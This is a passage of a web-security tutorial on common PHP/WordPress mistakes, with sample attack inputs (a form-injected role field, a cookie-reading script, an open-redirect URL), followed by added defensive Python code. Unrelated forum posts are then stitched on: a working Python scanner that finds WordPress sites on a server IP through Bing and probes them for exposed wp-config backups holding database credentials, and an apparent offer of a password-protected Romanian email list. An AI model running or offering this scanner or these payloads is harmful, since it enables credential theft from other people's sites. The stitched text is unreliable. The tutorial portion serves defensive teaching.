However, this is not enough and a wrong approach. If you save all user input in your Model (database), the user can add new input tags directly in his browser and try to guess some columns in your users table for which you have not provided an input in the website’s form. For example, many CakePHP applications have a “role” column set to user/admin or something similar (it is used in the docs as well). The user can just open his Developer Tools, find the registration form or right click and select Inspect Element, click on Edit as HTML and add a new input like this:

<input name=”data[user][role]” type=”text”>
<input name=” [user][role]” type=”text”>

Or whatever the current way for forms to interact with your Models is, guess column names and insert values into them.

One way to solve this is to change the name of the column that defines users’ roles and permissions to something unpredictable. However, that is not the safest approach you can take. You can either insert the data into the database manually, which will ensure no extra columns will be saved:

SNIPPET 3

Or alternatively, you could still save all user data but explicitly set the values of columns not found in the form:

SNIPPET 4

2. Allowing user access to assets

Many sites work with user input and user data and store this data. Clients can see where their assets are stored, so there is no need for them to guess. For example, a client could see that the images he uploaded were stored in /uploads/{username} because the images he uploaded were loaded to the page from that directory, so if he knows some usernames of different people he could just change the directory name to another user and browse through all of his data without having to brute-force directory names.

The first way to tackle this issue that we discussed before is not enough (adding Options All -Indexes to the .htaccess file). It would prevent users from browsing directories and opening whatever they want, but they would still know the directory exists and they can still guess directory names because the server will return a 403 Forbidden (which shows something exists in that path). Furthermore, they could guess file names from some patterns that the file names follow and open them.

Therefore, you need to block access to the files in your uploads directory. If you are storing text files (let us say users can keep notes and view/edit them whenever they want) you could add to your .htaccess the following rule:

RewriteEngine On
RewriteRule ^uploads/.*.(txt|doc)$ – [F,L,NC]

The F flag would return a 403 Forbidden response, the L flag causes the next rules to stop being processed, and the NC eliminates case-sensitivity.

Figure 1: The page with only directory listing disabled.

Figure 2: The page with only directory listing disabled. You cannot browse directories, but if each user has a notes.txt file, you can easily view a user’s notes by knowing only their username.

Figure 3: Trying to access the notes with both directory listing and controlled access to files.

If you use the rewrite rule to disable users from browsing other users’ notes, your back-end would still be able to access the notes, show them to users or edit them. For example:

SNIPPET 5

Where the $user variable would come from a session in a real-world application.

3. Running basic WordPress installation

Common mistakes here are not limiting the login attempts on your wp-admin page. This would allow anyone to brute-force your credentials and destroy your blog/site. This becomes even easier because most people create their master username to be ‘admin’, which involves only brute-forcing the password to get full access to the WP website. Another mistake is that the wp-admin login page is left without a form of CAPTCHA or a protection against bots. This combined with no limitation of login attempts equals certain death of your online presence at some point in the future. You could avoid all 3 of these things and also change the default wp-admin path to be something different as well (obfuscation).

4. Relying too much on IP addresses while having weak bot protection

Most ISPs provide dynamic IP addresses, and the IP address you have banned or stored may already be obsolete in less than a day. Furthermore, it is often not very difficult to change your IP address – use a proxy, release it from the router or from the OS, change locations. There are myriad ways to do it. To prevent bots from causing undesired consequences, it would be better to use alternative ways – enhance your CAPTCHAs, add inputs only bots will fill out, require JavaScript/cookies enabled to submit a form, and so on.

5. Improper redirects

Let us say that you have a redirect page or a GET value (for simplicity’s sake) that redirects users to another page of your site or to another website. However, if you forget to disallow redirects to third-party websites or, in case you allow those, if you do not create a warning page before redirecting that will tell the user where they are going and that they are leaving the site – users can easily abuse your site by giving links that seem to be pointing to your site but will redirect users to malicious websites.

if (isset($_GET['redirect'])) {
    header("Location: " . $_GET['redirect']);
}

If we have something as simple as this, then users can easily get fooled into entering bad sites by following a URL like this:

http://localhost:8079/articles/Website%20Hacking%20Part%20VII/?redirect=http://www.somemalicioussitehere.com

6. Cross Site Request Forgery

If your site allows users to add comments/posts and insert tags such as <img> and load a third-party image, they can provide a link that is not an image but will fool the clients’ browsers (the users that will be reading them) into loading the resource and performing an action on a website if they are authenticated in it. For example, if Facebook accepted a couple of GET parameters or a particular URL to follow someone/something on their network, we could have added an image like that:

my image

And if the user is currently logged in he would have followed an arbitrary person. Of course, this would not work in this particular situation.

7. Insecure file handling

A common mistake is to trust that a file does not contain something inappropriate. Code can be disguised as an image, so checking the file extension is not enough. At the very least, the MIME type should also be checked. Also, ASCII / text files should be escaped.

Here is an example of such a vulnerability:

SNIPPET 6

The vulnerability arises when at some point we display the contents of the .txt file in our page:

SNIPPET 7

If the file we submit contains the following code:

<script>
alert(document.cookie);
</script>

Then all user cookies for that website will be shown in an alert.

8. Displaying and trusting HTTP headers

These can be modified by users and can be malicious. For example, if you display the client’s User-Agent header, it might be changed to consist of code which would then be executed in your back-end. This is also valid for the Referer header, so it should not be used by itself to determine whether the user can access a particular page (for example, checking if the referrer is the login page and assuming the user has logged in successfully since he was redirected to the members area’s index page from the login page).

9. Information disclosure

Your live apps should not be in debug mode. Errors should not be shown.

10. Directory traversal

If you are using some parameter that opens different files on your website based on user input, your back-end should escape special characters such as the . (dot) or / (slash) from the input and preferably use whitelisting.

11. Using HTTP for semi-confidential data

A common flaw is using HTTP for sites that include mechanisms such as registration/login. Even widely used online marketplaces in Bulgaria use simple HTTP (such as OLX.bg). Using HTTP makes it easy for potential attackers in your network to sniff your traffic and get your credentials with no real effort. For example, if you log in to olx while on a Wi-Fi, you are subject to risk.

13. Sessions can be stolen

Sessions can be stolen, making the attacker log in as someone else. There are multiple vectors of defense here – such as checking the IP address, the user agent, regenerating the session, and adding cookies.

14. Be careful which third-party libraries, CDNs and plugins you use

They might be simply outdated, opening a wide variety of security holes, or they might be malicious – giving the shady library’s creator access to your server.

15. Bots are everywhere

Take care of malicious bots not by banning their IP but by enhancing CAPTCHA, adding hidden form fields that users would not fill, and requiring JavaScript or cookies enabled to submit a form.

16. Use HTTP only cookies

This would reduce the impact of some other attacks – such as XSS.

17. Hashing

Hash your passwords and try to avoid md5 or sha-1 algorithms (https://community.qualys.com/blogs/securitylabs/2014/09/09/sha1-deprecation-what-you-need-to-know, hash - Why does some popular software still use md5? - Information Security Stack Exchange). Use salts to prevent attacks with rainbow tables.

18. XSS

Always escape input unless you really, really trust the source (admin panel). You can either remove tags or display them as entities depending on your needs.

PHP: strip_tags($input, $allowedTags); htmlspecialchars($input, ENT_QUOTES); htmlentities($input);

19. SQL Injection

Use prepared statements or do not perform a query which is not hardcoded without sanitizing it (PHP: PDO class, or sanitize with mysqli_real_escape_string($conn, $str) if using mysqli. Do not use mysql_*).

Conclusion

This was the last part of the Website Hacking series. We have introduced some new vulnerabilities and briefly discussed them and have summarized our points for everything that we have talked about so far. We hope that now you will feel more confident when deploying your web apps by putting these strategies in use.

Source
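Item 1 of the article above (saving all user input) is missing its snippets, so here is an added example of the fix it describes, written by me rather than taken from the article or from CakePHP: the registration input is bound to an explicit allowlist of fields, and the role column is set by the server no matter what the client submits. The data[user][field] naming scheme mirrors the article's CakePHP form; how the flat POST pairs are parsed is my own assumption about the request shape, and the sample POST is constructed.

```python
"""Added example (not from the article): binding registration input to a
model with an explicit field allowlist, so an extra form field such as
data[user][role] injected through the browser's developer tools is dropped.
"""
import re

BINDABLE_FIELDS = {"username", "email", "password"}   # what the form legitimately sends
SERVER_SET_FIELDS = {"role": "user"}                    # never taken from the request

# Assumed request shape, modelled on the article's form: data[<model>][<field>]
FIELD_RE = re.compile(r"^data\[(?P<model>\w+)\]\[(?P<field>\w+)\]$")


def parse_form(raw_pairs):
    """Turn flat POST pairs like ('data[user][email]', 'a@b') into
    {'user': {'email': 'a@b'}}; names that do not fit the scheme are ignored."""
    out = {}
    for name, value in raw_pairs:
        m = FIELD_RE.match(name)
        if m:
            out.setdefault(m.group("model"), {})[m.group("field")] = value
    return out


def bind_user(form):
    """Build the record to save: allowlisted input fields plus server-controlled
    fields. Returns the record and the list of field names that were dropped,
    which is worth logging: a client sending 'role' is probing for exactly the
    mass-assignment hole the article describes."""
    submitted = form.get("user", {})
    record = {k: v for k, v in submitted.items() if k in BINDABLE_FIELDS}
    dropped = sorted(set(submitted) - BINDABLE_FIELDS)
    record.update(SERVER_SET_FIELDS)   # overrides anything the client tried to set
    # The password would still be hashed before storage (article item 17);
    # that step is left out here to keep the binding logic in focus.
    return record, dropped


# Constructed request: the normal fields plus an injected role field.
SAMPLE_POST = [
    ("data[user][username]", "alice"),
    ("data[user][email]", "alice@example.com"),
    ("data[user][password]", "hunter2"),
    ("data[user][role]", "admin"),
]

if __name__ == "__main__":
    record, dropped = bind_user(parse_form(SAMPLE_POST))
    print("saving:", record)
    print("dropped client-supplied fields:", dropped)
```

The same pattern works whichever framework is in use: the allowlist lives beside the model, not in the form template, so adding an input in the browser cannot widen it.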
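For item 5 (improper redirects), the article shows only the vulnerable header("Location: " . $_GET['redirect']) call. The following is an added example of the validation that should sit in front of it; it is my code, not the article's, and goes somewhat beyond the article's one case by also rejecting the protocol-relative, backslash, userinfo and lookalike-host forms that a plain string-prefix check misses. The site host app.example.com and the fallback target "/" are assumptions.

```python
"""Added example (not from the article): validating a ?redirect= value before
issuing a Location header. 'app.example.com' is an assumed hostname for the
site; the fallback target '/' is also an assumption.
"""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"app.example.com"}
DEFAULT_TARGET = "/"


def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return value if it stays on this site, otherwise the default.

    Accepts: site-relative paths ("/account") and absolute http(s) URLs whose
    host is exactly one of the allowed hosts.
    Rejects: other schemes (javascript:, data:), protocol-relative "//evil",
    backslash variants ("/\\evil", which browsers read as "//evil"),
    userinfo tricks ("http://app.example.com@evil"), host-suffix lookalikes
    ("app.example.com.evil") and control characters (CR/LF would also allow
    header injection)."""
    if not isinstance(value, str) or not value:
        return default
    # Browsers treat backslashes as slashes in URLs; normalise before parsing
    # so the check sees what the browser will see.
    candidate = value.replace("\\", "/")
    if any(ord(c) < 0x20 for c in candidate):
        return default
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: must be an absolute path on this site, and a
        # single leading slash only ("//host" is network-path, not local).
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    if parts.scheme not in ("http", "https"):
        return default
    if parts.username is not None or parts.password is not None:
        return default
    if parts.hostname is None or parts.hostname.lower() not in allowed_hosts:
        return default
    return candidate


if __name__ == "__main__":
    # Constructed inputs, including the article's own example target.
    for v in ["/account/settings",
              "https://app.example.com/profile",
              "http://www.somemalicioussitehere.com",
              "//www.somemalicioussitehere.com",
              "/\\www.somemalicioussitehere.com",
              "javascript:alert(1)"]:
        print("%-45r -> %r" % (v, safe_redirect_target(v)))
```

An exact host match is deliberate: a suffix or substring check ("example.com" in host) is the usual way these allowlists get bypassed. If third-party redirects are genuinely required, the article's interstitial warning page is the place to send anything this function rejects, not the raw value.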
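Items 2, 7 and 10 (asset access, insecure file handling, directory traversal) describe one upload pipeline from three angles, so here is a single added example covering all three; it is my code, not the article's. It checks the file's leading bytes rather than trusting the extension, confines the stored path to a per-user directory that the web server does not serve directly (the article's rewrite rule handles that side), and HTML-escapes a text note before rendering it, which neutralises the <script>alert(document.cookie)</script> note from item 7. UPLOAD_ROOT, the accepted types and the sample files are assumptions constructed for the example.

```python
"""Added example (not from the article): upload validation, confined storage
path and safe display of text uploads. UPLOAD_ROOT and the accepted types are
assumptions; the sample files are constructed inline.
"""
import html
import posixpath

UPLOAD_ROOT = "/srv/app/uploads"   # assumed location, never served directly by the web server

# Magic bytes for the content types we accept; an extension alone proves nothing.
SIGNATURES = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}
TEXT_EXTENSIONS = {"txt"}


def detect_kind(filename, data):
    """Return the accepted kind ('png', 'jpg', 'gif', 'txt') or None when the
    extension is not allowed or the content does not match the extension."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext in SIGNATURES:
        return ext if any(data.startswith(sig) for sig in SIGNATURES[ext]) else None
    if ext in TEXT_EXTENSIONS:
        # Text is accepted when it decodes cleanly; it is escaped on output.
        try:
            data.decode("utf-8")
        except UnicodeDecodeError:
            return None
        return "txt"
    return None


def storage_path(username, filename):
    """Confine the stored file to UPLOAD_ROOT/<username>/ and refuse anything
    that would escape it. Returns None for rejected input."""
    if not username.isalnum():           # the directory name comes from the user record, not the URL
        return None
    base = posixpath.join(UPLOAD_ROOT, username)
    # Keep only the final path component (also for Windows-style separators),
    # then prove the normalised result is still inside base.
    name = posixpath.basename(filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        return None
    full = posixpath.normpath(posixpath.join(base, name))
    if not full.startswith(base + "/"):
        return None
    return full


def render_note(data):
    """Show a stored text file inside HTML without letting it become markup."""
    return "<pre>%s</pre>" % html.escape(data.decode("utf-8"), quote=True)


# Constructed samples: a PNG header, PHP code named as an image, and a note
# containing the article's cookie-stealing script.
SAMPLES = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "disguised.png": b"<?php echo 'hello'; ?>",
    "notes.txt": b"<script>alert(document.cookie);</script>",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        kind = detect_kind(name, data)
        print("%-14s kind=%-5s path=%s" % (name, kind, storage_path("alice", name) if kind else "-"))
    print(render_note(SAMPLES["notes.txt"]))
```

Checking magic bytes is the minimum the article asks for ("the MIME type should also be checked"); for images a stricter option is to re-encode the file with an image library so that nothing but pixel data survives. The basename step makes traversal attempts harmless, and the normpath check is there to prove it rather than to rely on it.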
  22.

# Python 2 script as posted (indentation restored); it uses urllib2 and raw_input.
import re, urllib2, sys, urllib

lista = []
# Backup file names the script probes for on each site it finds.
backup = ['wp-config.php~', 'wp-config.php.bak', 'wp-config.bak', 'wp-config.php-bak', '/wp-content/uploads/blog-backup.txt']

def unique(seq):
    # Deduplicate while keeping the original order.
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]

def grabwp(ip):
    # Collect WordPress sites hosted on the given IP from Bing search results.
    try:
        s = ip
        page = 1
        print('\n')
        while page <= 21:
            bing = "http://www.bing.com/search?q=ip%3A" + s + "+?page_id=&count=50&first=" + str(page)
            openbing = urllib2.urlopen(bing)
            readbing = openbing.read()
            findwebs = re.findall('<h2><a href="(.*?)"', readbing)
            for i in range(len(findwebs)):
                wpnoclean = findwebs[i]
                findwp = re.findall('(.*?)\?page_id=', wpnoclean)
                lista.extend(findwp)
            page = page + 10
    except IndexError:
        pass

def searchbackup(site, config):
    # Report the file if it is reachable and looks like a wp-config backup.
    try:
        read = urllib2.urlopen(site + "/" + config).read()
        rs = re.findall("USER", read)
        if rs:
            print "BACKUP FILE > " + site + "/" + config
    except:
        pass

def scan():
    final = unique(lista)
    for site in final:
        for config in backup:
            searchbackup(site, config)

print "\!/ Server Wordpress Backup Files Scanner By YASSINOX.TN !/"
print ''
ip = raw_input("Server Ip Adress : ")
grabwp(ip)
final = unique(lista)
print "Done ! Grabbed " + str(len(final)) + " Wordpress Sites On This Server"
print "---------------------------------------------------"
scan()
print "---------------------------------------------------"
  23. Facebook Multi-Page/Group Poster
  24. sleed

    RO e-mails

    Archive password: 64+-MD5 3243c6fdf4719ff0a35b872b7d842eaa // Page Rank 4 Download